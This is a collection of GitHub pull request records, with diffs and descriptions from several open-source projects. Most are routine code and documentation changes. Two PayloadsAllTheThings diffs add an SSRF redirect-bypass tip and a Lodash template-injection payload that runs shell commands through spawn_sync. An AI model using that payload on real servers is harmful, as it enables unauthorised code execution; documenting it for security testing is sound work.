<li>Additional commits viewable in <a href="https://github.com/pre-commit/pre-commit/compare/v2.16.0...v2.17.0">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details> | https://api.github.com/repos/Textualize/rich/pulls/1850 | 2022-01-19T13:30:47Z | 2022-02-11T11:13:51Z | 2022-02-11T11:13:51Z | 2022-02-11T11:15:09Z | 785 | Textualize/rich | 48,346 |
Use uv in docs build | diff --git a/.github/workflows/doc.yml b/.github/workflows/doc.yml
index 006991a16d..4c592d7391 100644
--- a/.github/workflows/doc.yml
+++ b/.github/workflows/doc.yml
@@ -30,9 +30,9 @@ jobs:
- name: Install dependencies
run: |
- python -m pip install --upgrade pip setuptools wheel
- python -m pip install -e ".[d]"
- python -m pip install -r "docs/requirements.txt"
+ python -m pip install uv
+ python -m uv pip install --system -e ".[d]"
+ python -m uv pip install --system -r "docs/requirements.txt"
- name: Build documentation
run: sphinx-build -a -b html -W --keep-going docs/ docs/_build
| Currently pip spends >20s here | https://api.github.com/repos/psf/black/pulls/4310 | 2024-04-14T08:10:10Z | 2024-04-14T08:51:07Z | 2024-04-14T08:51:07Z | 2024-04-14T08:51:12Z | 193 | psf/black | 24,620 |
Mac:大幅提升启动速度 | diff --git a/launcher/mac_tray.py b/launcher/mac_tray.py
index b9cbf863f4..2f011efdb3 100644
--- a/launcher/mac_tray.py
+++ b/launcher/mac_tray.py
@@ -22,12 +22,12 @@
import subprocess
import webbrowser
-from AppKit import *
-from SystemConfiguration import *
+import AppKit
+import SystemConfiguration
from instances import xlog
from PyObjCTools import AppHelper
-class MacTrayObject(NSObject):
+class MacTrayObject(AppKit.NSObject):
def __init__(self):
pass
@@ -37,12 +37,12 @@ def applicationDidFinishLaunching_(self, notification):
self.registerObserver()
def setupUI(self):
- self.statusbar = NSStatusBar.systemStatusBar()
- self.statusitem = self.statusbar.statusItemWithLength_(NSSquareStatusItemLength) #NSSquareStatusItemLength #NSVariableStatusItemLength
+ self.statusbar = AppKit.NSStatusBar.systemStatusBar()
+ self.statusitem = self.statusbar.statusItemWithLength_(AppKit.NSSquareStatusItemLength) #NSSquareStatusItemLength #NSVariableStatusItemLength
# Set initial image icon
icon_path = os.path.join(current_path, "web_ui", "favicon-mac.ico")
- image = NSImage.alloc().initByReferencingFile_(icon_path.decode('utf-8'))
+ image = AppKit.NSImage.alloc().initByReferencingFile_(icon_path.decode('utf-8'))
image.setScalesWhenResized_(True)
image.setSize_((20, 20))
self.statusitem.setImage_(image)
@@ -55,63 +55,63 @@ def setupUI(self):
proxyState = getProxyState(currentService)
# Build a very simple menu
- self.menu = NSMenu.alloc().initWithTitle_('XX-Net')
+ self.menu = AppKit.NSMenu.alloc().initWithTitle_('XX-Net')
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Config', 'config:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Config', 'config:', '')
self.menu.addItem_(menuitem)
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(getCurrentServiceMenuItemTitle(), None, '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(getCurrentServiceMenuItemTitle(), None, '')
self.menu.addItem_(menuitem)
self.currentServiceMenuItem = menuitem
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Auto GAEProxy', 'enableAutoProxy:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Auto GAEProxy', 'enableAutoProxy:', '')
if proxyState == 'pac':
- menuitem.setState_(NSOnState)
+ menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.autoGaeProxyMenuItem = menuitem
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Global GAEProxy', 'enableGlobalProxy:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Global GAEProxy', 'enableGlobalProxy:', '')
if proxyState == 'gae':
- menuitem.setState_(NSOnState)
+ menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.globalGaeProxyMenuItem = menuitem
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Disable GAEProxy', 'disableProxy:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Disable GAEProxy', 'disableProxy:', '')
if proxyState == 'disable':
- menuitem.setState_(NSOnState)
+ menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.disableGaeProxyMenuItem = menuitem
# Reset Menu Item
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Reload GAEProxy', 'resetGoagent:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Reload GAEProxy', 'resetGoagent:', '')
self.menu.addItem_(menuitem)
# Default event
- menuitem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Quit', 'windowWillClose:', '')
+ menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Quit', 'windowWillClose:', '')
self.menu.addItem_(menuitem)
# Bind it to the status item
self.statusitem.setMenu_(self.menu)
# Hide dock icon
- NSApp.setActivationPolicy_(NSApplicationActivationPolicyProhibited)
+ AppKit.NSApp.setActivationPolicy_(AppKit.NSApplicationActivationPolicyProhibited)
def updateStatusBarMenu(self):
self.currentServiceMenuItem.setTitle_(getCurrentServiceMenuItemTitle())
# Remove Tick before All Menu Items
- self.autoGaeProxyMenuItem.setState_(NSOffState)
- self.globalGaeProxyMenuItem.setState_(NSOffState)
- self.disableGaeProxyMenuItem.setState_(NSOffState)
+ self.autoGaeProxyMenuItem.setState_(AppKit.NSOffState)
+ self.globalGaeProxyMenuItem.setState_(AppKit.NSOffState)
+ self.disableGaeProxyMenuItem.setState_(AppKit.NSOffState)
# Get current selected mode
proxyState = getProxyState(currentService)
# Update Tick before Menu Item
if proxyState == 'pac':
- self.autoGaeProxyMenuItem.setState_(NSOnState)
+ self.autoGaeProxyMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'gae':
- self.globalGaeProxyMenuItem.setState_(NSOnState)
+ self.globalGaeProxyMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'disable':
- self.disableGaeProxyMenuItem.setState_(NSOnState)
+ self.disableGaeProxyMenuItem.setState_(AppKit.NSOnState)
# Trigger autovalidation
self.menu.update()
@@ -126,16 +126,16 @@ def presentAlert_withTitle_(self, msg, title):
return self.alertReturn
def presentAlertWithInfo_(self, info):
- alert = NSAlert.alloc().init()
+ alert = AppKit.NSAlert.alloc().init()
alert.setMessageText_(info[0])
alert.setInformativeText_(info[1])
alert.addButtonWithTitle_("OK")
alert.addButtonWithTitle_("Cancel")
- self.alertReturn = alert.runModal() == NSAlertFirstButtonReturn
+ self.alertReturn = alert.runModal() == AppKit.NSAlertFirstButtonReturn
def registerObserver(self):
- nc = NSWorkspace.sharedWorkspace().notificationCenter()
- nc.addObserver_selector_name_object_(self, 'windowWillClose:', NSWorkspaceWillPowerOffNotification, None)
+ nc = AppKit.NSWorkspace.sharedWorkspace().notificationCenter()
+ nc.addObserver_selector_name_object_(self, 'windowWillClose:', AppKit.NSWorkspaceWillPowerOffNotification, None)
def windowWillClose_(self, notification):
executeResult = subprocess.check_output(['networksetup', '-listallnetworkservices'])
@@ -156,7 +156,7 @@ def windowWillClose_(self, notification):
module_init.stop_all()
os._exit(0)
- NSApp.terminate_(self)
+ AppKit.NSApp.terminate_(self)
def config_(self, notification):
host_port = config.get(["modules", "launcher", "control_port"], 8085)
@@ -280,30 +280,30 @@ def helperDisableGlobalProxy(service):
def fetchCurrentService(protocol):
global currentService
- status = SCDynamicStoreCopyValue(None, "State:/Network/Global/" + protocol)
+ status = SystemConfiguration.SCDynamicStoreCopyValue(None, "State:/Network/Global/" + protocol)
if not status:
currentService = None
return
serviceID = status['PrimaryService']
- service = SCDynamicStoreCopyValue(None, "Setup:/Network/Service/" + serviceID)
+ service = SystemConfiguration.SCDynamicStoreCopyValue(None, "Setup:/Network/Service/" + serviceID)
if not service:
currentService = None
return
currentService = service['UserDefinedName']
-@objc.callbackFor(CFNotificationCenterAddObserver)
+@AppKit.objc.callbackFor(AppKit.CFNotificationCenterAddObserver)
def networkChanged(center, observer, name, object, userInfo):
fetchCurrentService('IPv4')
sys_tray.updateStatusBarMenu()
# Note: the following code can't run in class
def serve_forever():
- app = NSApplication.sharedApplication()
+ app = AppKit.NSApplication.sharedApplication()
app.setDelegate_(sys_tray)
# Listen for network change
- nc = CFNotificationCenterGetDarwinNotifyCenter()
- CFNotificationCenterAddObserver(nc, None, networkChanged, "com.apple.system.config.network_change", None, CFNotificationSuspensionBehaviorDeliverImmediately)
+ nc = AppKit.CFNotificationCenterGetDarwinNotifyCenter()
+ AppKit.CFNotificationCenterAddObserver(nc, None, networkChanged, "com.apple.system.config.network_change", None, AppKit.CFNotificationSuspensionBehaviorDeliverImmediately)
fetchCurrentService('IPv4')
AppHelper.runEventLoop()
| AppKit包含很多符号,`from AppKit import *`会耗费大量时间
在我电脑(mid-2012 MacBook Pro)上启动时间从4.25s降为0.21s
| https://api.github.com/repos/XX-net/XX-Net/pulls/2642 | 2016-04-02T14:58:05Z | 2016-04-03T03:42:50Z | 2016-04-03T03:42:50Z | 2016-04-03T03:42:50Z | 2,068 | XX-net/XX-Net | 17,146 |
Added information on 307 and 308 redirects | diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index a16cb7d839..acbea08252 100644
--- a/Server Side Request Forgery/README.md
+++ b/Server Side Request Forgery/README.md
@@ -255,6 +255,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/
1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
+3. You can use response codes [307](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307) and [308](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308) in order to retain HTTP method and body after the redirection.
```
### Bypassing using type=url
| 307 and 308 redirects can be helpful when needing to send a POST request to a target while bypassing restrictions using redirection. | https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/500 | 2022-05-19T09:57:17Z | 2022-05-19T10:29:02Z | 2022-05-19T10:29:02Z | 2022-05-19T10:29:02Z | 244 | swisskyrepo/PayloadsAllTheThings | 8,387 |
Add Airtable API to Documents & Productivity | diff --git a/README.md b/README.md
index b86ccccf7f..9c27dbd935 100644
--- a/README.md
+++ b/README.md
@@ -391,6 +391,7 @@ API | Description | Auth | HTTPS | CORS |
### Documents & Productivity
API | Description | Auth | HTTPS | CORS |
|---|---|---|---|---|
+| [Airtable](https://airtable.com/api) | Integrate with Airtable | `apiKey` | Yes | Unknown |
| [apilayer pdflayer](https://pdflayer.com) | HTML/URL to PDF | `apiKey` | Yes | Unknown |
| [Cloudmersive Document and Data Conversion](https://cloudmersive.com/convert-api) | HTML/URL to PDF/PNG, Office documents to PDF, image conversion | `apiKey` | Yes | Yes |
| [Code::Stats](https://codestats.net/api-docs) | Automatic time tracking for programmers | `apiKey` | Yes | No |
| <!-- Thank you for taking the time to work on a Pull Request for this project! -->
<!-- To ensure your PR is dealt with swiftly please check the following: -->
- [x] My submission is formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md)
- [x] My addition is ordered alphabetically
- [x] My submission has a useful description
- [x] The description does not end with punctuation
- [x] Each table column is padded with one space on either side
- [x] I have searched the repository for any relevant issues or pull requests
- [x] Any category I am creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit
[squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
| https://api.github.com/repos/public-apis/public-apis/pulls/1884 | 2021-07-23T04:29:00Z | 2021-07-31T22:07:40Z | 2021-07-31T22:07:40Z | 2021-07-31T22:15:39Z | 225 | public-apis/public-apis | 35,786 |
Clarified Concat example in docs. | diff --git a/docs/ref/models/database-functions.txt b/docs/ref/models/database-functions.txt
index acddc7cbe4a37..544c147ed257c 100644
--- a/docs/ref/models/database-functions.txt
+++ b/docs/ref/models/database-functions.txt
@@ -88,8 +88,9 @@ Usage examples::
Accepts a list of at least two text fields or expressions and returns the
concatenated text. Each argument must be of a text or char type. If you want
to concatenate a ``TextField()`` with a ``CharField()``, then be sure to tell
-Django that the ``output_field`` should be a ``TextField()``. This is also
-required when concatenating a ``Value`` as in the example below.
+Django that the ``output_field`` should be a ``TextField()``. Specifying an
+``output_field`` is also required when concatenating a ``Value`` as in the
+example below.
This function will never have a null result. On backends where a null argument
results in the entire expression being null, Django will ensure that each null
@@ -102,8 +103,11 @@ Usage example::
>>> from django.db.models.functions import Concat
>>> Author.objects.create(name='Margaret Smith', goes_by='Maggie')
>>> author = Author.objects.annotate(
- ... screen_name=Concat('name', V(' ('), 'goes_by', V(')'),
- ... output_field=CharField())).get()
+ ... screen_name=Concat(
+ ... 'name', V(' ('), 'goes_by', V(')'),
+ ... output_field=CharField()
+ ... )
+ ... ).get()
>>> print(author.screen_name)
Margaret Smith (Maggie)
| Fixed example in documentation:
- Use TextField instead of CharField as it's stated above it should be,
- Readjusted indentation to make clearer the output_field is argument to Concat() and not annotate()
- Use [] instead of () in Values to make it a bit easier to read with less brackets all over the place | https://api.github.com/repos/django/django/pulls/8900 | 2017-08-13T13:26:40Z | 2017-08-14T18:57:51Z | 2017-08-14T18:57:51Z | 2017-08-14T18:57:51Z | 385 | django/django | 51,031 |
feat: Get answers using preferred number of chunks | diff --git a/README.md b/README.md
index 9881dec3c..6d2121348 100644
--- a/README.md
+++ b/README.md
@@ -22,6 +22,7 @@ PERSIST_DIRECTORY: is the folder you want your vectorstore in
MODEL_PATH: Path to your GPT4All or LlamaCpp supported LLM
MODEL_N_CTX: Maximum token limit for the LLM model
EMBEDDINGS_MODEL_NAME: SentenceTransformers embeddings model name (see https://www.sbert.net/docs/pretrained_models.html)
+TARGET_SOURCE_CHUNKS: The amount of chunks (sources) that will be used to answer a question
```
Note: because of the way `langchain` loads the `SentenceTransformers` embeddings, the first time you run the script it will require internet connection to download the embeddings model itself.
diff --git a/example.env b/example.env
index 829078457..bcf13ebbb 100644
--- a/example.env
+++ b/example.env
@@ -2,4 +2,5 @@ PERSIST_DIRECTORY=db
MODEL_TYPE=GPT4All
MODEL_PATH=models/ggml-gpt4all-j-v1.3-groovy.bin
EMBEDDINGS_MODEL_NAME=all-MiniLM-L6-v2
-MODEL_N_CTX=1000
\ No newline at end of file
+MODEL_N_CTX=1000
+TARGET_SOURCE_DOCUMENTS=4
\ No newline at end of file
diff --git a/privateGPT.py b/privateGPT.py
index 7adab52d0..8fa10a6e0 100755
--- a/privateGPT.py
+++ b/privateGPT.py
@@ -16,6 +16,7 @@
model_type = os.environ.get('MODEL_TYPE')
model_path = os.environ.get('MODEL_PATH')
model_n_ctx = os.environ.get('MODEL_N_CTX')
+target_source_chunks = int(os.environ.get('TARGET_SOURCE_CHUNKS',4))
from constants import CHROMA_SETTINGS
@@ -24,7 +25,7 @@ def main():
args = parse_arguments()
embeddings = HuggingFaceEmbeddings(model_name=embeddings_model_name)
db = Chroma(persist_directory=persist_directory, embedding_function=embeddings, client_settings=CHROMA_SETTINGS)
- retriever = db.as_retriever()
+ retriever = db.as_retriever(search_kwargs={"k": target_source_chunks})
# activate/deactivate the streaming StdOut callback for LLMs
callbacks = [] if args.mute_stream else [StreamingStdOutCallbackHandler()]
# Prepare the LLM
| The current implementation uses 4 chunks by default. This commit adds the functionality of changing the number of chunks to be used in the generation of answers.
Answers #416 | https://api.github.com/repos/zylon-ai/private-gpt/pulls/460 | 2023-05-24T18:17:32Z | 2023-05-25T06:26:20Z | 2023-05-25T06:26:20Z | 2023-05-25T10:34:43Z | 565 | zylon-ai/private-gpt | 38,604 |
[dbtv] Add new extractor | diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py
index e49ac3e5278..c43dfd7ea1f 100644
--- a/youtube_dl/extractor/__init__.py
+++ b/youtube_dl/extractor/__init__.py
@@ -62,6 +62,7 @@
DailymotionUserIE,
)
from .daum import DaumIE
+from .dbtv import DBTVIE
from .dotsub import DotsubIE
from .dreisat import DreiSatIE
from .drtv import DRTVIE
diff --git a/youtube_dl/extractor/dbtv.py b/youtube_dl/extractor/dbtv.py
new file mode 100644
index 00000000000..cf76dbf0533
--- /dev/null
+++ b/youtube_dl/extractor/dbtv.py
@@ -0,0 +1,76 @@
+# coding: utf-8
+from __future__ import unicode_literals
+
+import re
+
+from .common import InfoExtractor
+
+from ..utils import (
+ ExtractorError
+)
+
+class DBTVIE(InfoExtractor):
+ _VALID_URL = r'http://dbtv.no/(?P<id>[0-9]+)/?(?P<slug>.*)$'
+ _TEST = {
+ 'url': 'http://dbtv.no/3649835190001#Skulle_teste_ut_fornøyelsespark,_men_kollegaen_var_bare_opptatt_av_bikinikroppen',
+ 'md5': 'b89953ed25dacb6edb3ef6c6f430f8bc',
+ 'info_dict': {
+ 'id': '3649835190001',
+ 'ext': 'mp4',
+ 'title': 'Skulle teste ut fornøyelsespark, men kollegaen var bare opptatt av bikinikroppen',
+ 'description': 'md5:d681bf2bb7dd3503892cedb9c2d0e6f2',
+ 'thumbnail': 'http://gfx.dbtv.no/thumbs/still/33100.jpg',
+ 'timestamp': 1404039863,
+ 'upload_date': '20140629',
+ 'duration': 69544,
+ }
+ }
+
+ def _real_extract(self, url):
+ mobj = re.match(self._VALID_URL, url)
+ video_id = mobj.group('id')
+
+ # Download JSON file containing video info.
+ data = self._download_json('http://api.dbtv.no/discovery/%s' % video_id, video_id, 'Downloading media JSON')
+ # We only want the first video in the JSON API file.
+ video = data['playlist'][0]
+
+ # Check for full HD video, else use the standard video URL
+ for i in range(0, len(video['renditions'])):
+ if int(video['renditions'][i]['width']) == 1280:
+ video_url = video['renditions'][i]['URL']
+ break
+ else:
+ video_url = video['URL']
+
+ # Add access token to image or it will fail.
+ thumbnail = video['splash']
+
+ # Duration int.
+ duration = int(video['length'])
+
+ # Timestamp is given in milliseconds.
+ timestamp = float(str(video['publishedAt'])[0:-3])
+
+ formats = []
+
+ # Video URL.
+ if video['URL'] is not None:
+ formats.append({
+ 'url': video_url,
+ 'format_id': 'mp4',
+ 'ext': 'mp4'
+ })
+ else:
+ raise ExtractorError('No download URL found for video: %s.' % video_id, expected=True)
+
+ return {
+ 'id': video_id,
+ 'title': video['title'],
+ 'description': video['desc'],
+ 'thumbnail': thumbnail,
+ 'timestamp': timestamp,
+ 'duration': duration,
+ 'view_count': video['views'],
+ 'formats': formats,
+ }
| https://api.github.com/repos/ytdl-org/youtube-dl/pulls/3685 | 2014-09-05T09:27:45Z | 2014-09-05T12:54:36Z | 2014-09-05T12:54:36Z | 2014-09-05T12:55:44Z | 939 | ytdl-org/youtube-dl | 50,521 | |
Update README.md | diff --git a/README.md b/README.md
index 1d288783..a207bbfc 100644
--- a/README.md
+++ b/README.md
@@ -457,6 +457,7 @@ Further resources:
#### Deep Learning
* [Deeplearning4j](https://github.com/deeplearning4j/deeplearning4j) - Scalable deep learning for industry with parallel GPUs.
+* [Keras Beginner Tutorial](https://victorzhou.com/blog/keras-neural-network-tutorial/) - Friendly guide on using Keras to implement a simple Neural Network in Python
<a name="javascript"></a>
## Javascript
| added new source to Deep Learning on how to create neural network using Keras. | https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/613 | 2019-06-17T19:48:33Z | 2019-06-18T03:07:12Z | 2019-06-18T03:07:12Z | 2019-06-18T03:07:12Z | 145 | josephmisiti/awesome-machine-learning | 52,472 |
Enable asynchronous job submission in BigQuery Insert Job | diff --git a/airflow/providers/google/cloud/hooks/bigquery.py b/airflow/providers/google/cloud/hooks/bigquery.py
index feb90f4c10560..75da470fece30 100644
--- a/airflow/providers/google/cloud/hooks/bigquery.py
+++ b/airflow/providers/google/cloud/hooks/bigquery.py
@@ -1498,6 +1498,7 @@ def insert_job(
job_id: Optional[str] = None,
project_id: Optional[str] = None,
location: Optional[str] = None,
+ nowait: bool = False,
) -> BigQueryJob:
"""
Executes a BigQuery job. Waits for the job to complete and returns job id.
@@ -1514,6 +1515,7 @@ def insert_job(
characters. If not provided then uuid will be generated.
:param project_id: Google Cloud Project where the job is running
:param location: location the job is running
+ :param nowait: specify whether to insert job without waiting for the result
"""
location = location or self.location
job_id = job_id or self._custom_job_id(configuration)
@@ -1541,8 +1543,12 @@ def insert_job(
raise AirflowException(f"Unknown job type. Supported types: {supported_jobs.keys()}")
job = job.from_api_repr(job_data, client)
self.log.info("Inserting job %s", job.job_id)
- # Start the job and wait for it to complete and get the result.
- job.result()
+ if nowait:
+ # Initiate the job and don't wait for it to complete.
+ job._begin()
+ else:
+ # Start the job and wait for it to complete and get the result.
+ job.result()
return job
def run_with_configuration(self, configuration: dict) -> str:
diff --git a/tests/providers/google/cloud/hooks/test_bigquery.py b/tests/providers/google/cloud/hooks/test_bigquery.py
index 48f15fd2c9969..2468de2079cc8 100644
--- a/tests/providers/google/cloud/hooks/test_bigquery.py
+++ b/tests/providers/google/cloud/hooks/test_bigquery.py
@@ -54,8 +54,8 @@
TABLE_REFERENCE = TableReference.from_api_repr(TABLE_REFERENCE_REPR)
-class _BigQueryBaseTestClass(unittest.TestCase):
- def setUp(self) -> None:
+class _BigQueryBaseTestClass:
+ def setup_method(self) -> None:
class MockedBigQueryHook(BigQueryHook):
def _get_credentials_and_project_id(self):
return CREDENTIALS, PROJECT_ID
@@ -898,9 +898,10 @@ def test_run_query_with_arg(self, mock_insert):
_, kwargs = mock_insert.call_args
assert kwargs["configuration"]['labels'] == {'label1': 'test1', 'label2': 'test2'}
+ @pytest.mark.parametrize('nowait', [True, False])
@mock.patch("airflow.providers.google.cloud.hooks.bigquery.QueryJob")
@mock.patch("airflow.providers.google.cloud.hooks.bigquery.BigQueryHook.get_client")
- def test_insert_job(self, mock_client, mock_query_job):
+ def test_insert_job(self, mock_client, mock_query_job, nowait):
job_conf = {
"query": {
"query": "SELECT * FROM test",
@@ -910,10 +911,7 @@ def test_insert_job(self, mock_client, mock_query_job):
mock_query_job._JOB_TYPE = "query"
self.hook.insert_job(
- configuration=job_conf,
- job_id=JOB_ID,
- project_id=PROJECT_ID,
- location=LOCATION,
+ configuration=job_conf, job_id=JOB_ID, project_id=PROJECT_ID, location=LOCATION, nowait=nowait
)
mock_client.assert_called_once_with(
@@ -928,7 +926,12 @@ def test_insert_job(self, mock_client, mock_query_job):
},
mock_client.return_value,
)
- mock_query_job.from_api_repr.return_value.result.assert_called_once_with()
+ if nowait:
+ mock_query_job.from_api_repr.return_value._begin.assert_called_once()
+ mock_query_job.from_api_repr.return_value.result.assert_not_called()
+ else:
+ mock_query_job.from_api_repr.return_value._begin.assert_not_called()
+ mock_query_job.from_api_repr.return_value.result.assert_called_once()
def test_dbapi_get_uri(self):
assert self.hook.get_uri().startswith('bigquery://')
@@ -2014,7 +2017,7 @@ def test_create_external_table_labels(self, mock_create):
)
_, kwargs = mock_create.call_args
- self.assertDictEqual(kwargs['table_resource']['labels'], labels)
+ assert kwargs['table_resource']['labels'] == labels
@mock.patch("airflow.providers.google.cloud.hooks.bigquery.BigQueryHook.create_empty_table")
def test_create_external_table_description(self, mock_create):
| - Add nowait flag to the insert_job method
- When nowait is True, the execution won't wait till the job results are available.
- By default, the job execution will wait till job results are available.
cc @dstandish @kaxil
---
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code change, Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in [UPDATING.md](https://github.com/apache/airflow/blob/main/UPDATING.md).
| https://api.github.com/repos/apache/airflow/pulls/21385 | 2022-02-07T10:54:16Z | 2022-02-11T06:16:10Z | 2022-02-11T06:16:10Z | 2022-03-24T10:37:12Z | 1,083 | apache/airflow | 14,711 |
Update Lodash SSTI | diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 66d0219c79..36af6926e5 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -56,6 +56,9 @@
- [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
- [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
- [Plugins](#plugins)
+ - [JavaScript - Lodash](#Lodash)
+ - [Lodash - Basic Injection](#Lodash---Basic-Injection)
+ - [Lodash - Command Execution](#Lodash---Command-Execution)
- [Python - Mako](#mako)
- [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace)
- [Java - Pebble](#pebble)
@@ -743,6 +746,51 @@ registerPlugin({
---
+## Lodash
+
+[Official website](https://lodash.com/docs/4.17.15)
+
+### Lodash - Basic Injection
+
+How to create a template:
+
+```javascript
+const _ = require('lodash');
+string = "{{= username}}"
+const options = {
+ evaluate: /\{\{(.+?)\}\}/g,
+ interpolate: /\{\{=(.+?)\}\}/g,
+ escape: /\{\{-(.+?)\}\}/g,
+};
+
+_.template(string, options);
+```
+
+- **string:** The template string.
+- **options.interpolate:** It is a regular expression that specifies the HTML *interpolate* delimiter.
+- **options.evaluate:** It is a regular expression that specifies the HTML *evaluate* delimiter.
+- **options.escape:** It is a regular expression that specifies the HTML *escape* delimiter.
+
+For the purpose of RCE, the delimiter of templates is determined by the **options.evaluate** parameter.
+
+```javascript
+{{= _.VERSION}}
+${= _.VERSION}
+<%= _.VERSION %>
+
+
+{{= _.templateSettings.evaluate }}
+${= _.VERSION}
+<%= _.VERSION %>
+
+```
+
+### Lodash - Command Execution
+
+```
+{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
+```
+
## Mako
[Official website](https://www.makotemplates.org/)
| Added Lodash on the SSTI chapter. All the payloads are tested during the down under ctf 2023. | https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/670 | 2023-09-03T01:25:34Z | 2023-09-03T15:30:52Z | 2023-09-03T15:30:52Z | 2023-09-03T15:30:53Z | 606 | swisskyrepo/PayloadsAllTheThings | 8,443 |
Add back chess.com | diff --git a/removed_sites.json b/removed_sites.json
index 8878fc6d0..2bccbfd67 100644
--- a/removed_sites.json
+++ b/removed_sites.json
@@ -652,16 +652,6 @@
"username_claimed": "nielsrosanna",
"username_unclaimed": "noonewouldeverusethis7"
},
- "Chess": {
- "errorMsg": "\"valid\": false",
- "errorType": "message",
- "regexCheck": "^[a-z1-9]{3,25}$",
- "url": "https://www.chess.com/member/{}",
- "urlMain": "https://www.chess.com/",
- "urlProbe": "https://www.chess.com/callback/user/valid?username={}",
- "username_claimed": "blue",
- "username_unclaimed": "noonewouldeverusethis7"
- },
"Codeforces": {
"errorType": "response_url",
"errorUrl": "https://codeforces.com/",
diff --git a/removed_sites.md b/removed_sites.md
index 276a65674..3e996efc0 100644
--- a/removed_sites.md
+++ b/removed_sites.md
@@ -1341,22 +1341,6 @@ As of 2022-05-1, FanCentro returns false positives. Will later in new version of
},
```
-
-# Chess
-As og 2022-05-01, Chess.com returns false positives
-```
- "Chess": {
- "errorMsg": "\"valid\": false",
- "errorType": "message",
- "regexCheck": "^[a-z1-9]{3,25}$",
- "url": "https://www.chess.com/member/{}",
- "urlMain": "https://www.chess.com/",
- "urlProbe": "https://www.chess.com/callback/user/valid?username={}",
- "username_claimed": "blue",
- "username_unclaimed": "noonewouldeverusethis7"
- },
-```
-
## Codeforces
As og 2022-05-01, Codeforces returns false positives
```
diff --git a/sherlock/resources/data.json b/sherlock/resources/data.json
index 48a020787..46fde4ce7 100644
--- a/sherlock/resources/data.json
+++ b/sherlock/resources/data.json
@@ -371,6 +371,16 @@
"username_claimed": "cute18cute",
"username_unclaimed": "noonewouldeverusethis77777"
},
+ "Chess": {
+ "errorMsg": "Username is valid",
+ "errorType": "message",
+ "regexCheck": "^[a-z1-9]{3,25}$",
+ "url": "https://www.chess.com/member/{}",
+ "urlMain": "https://www.chess.com/",
+ "urlProbe": "https://www.chess.com/callback/user/valid?username={}",
+ "username_claimed": "blue",
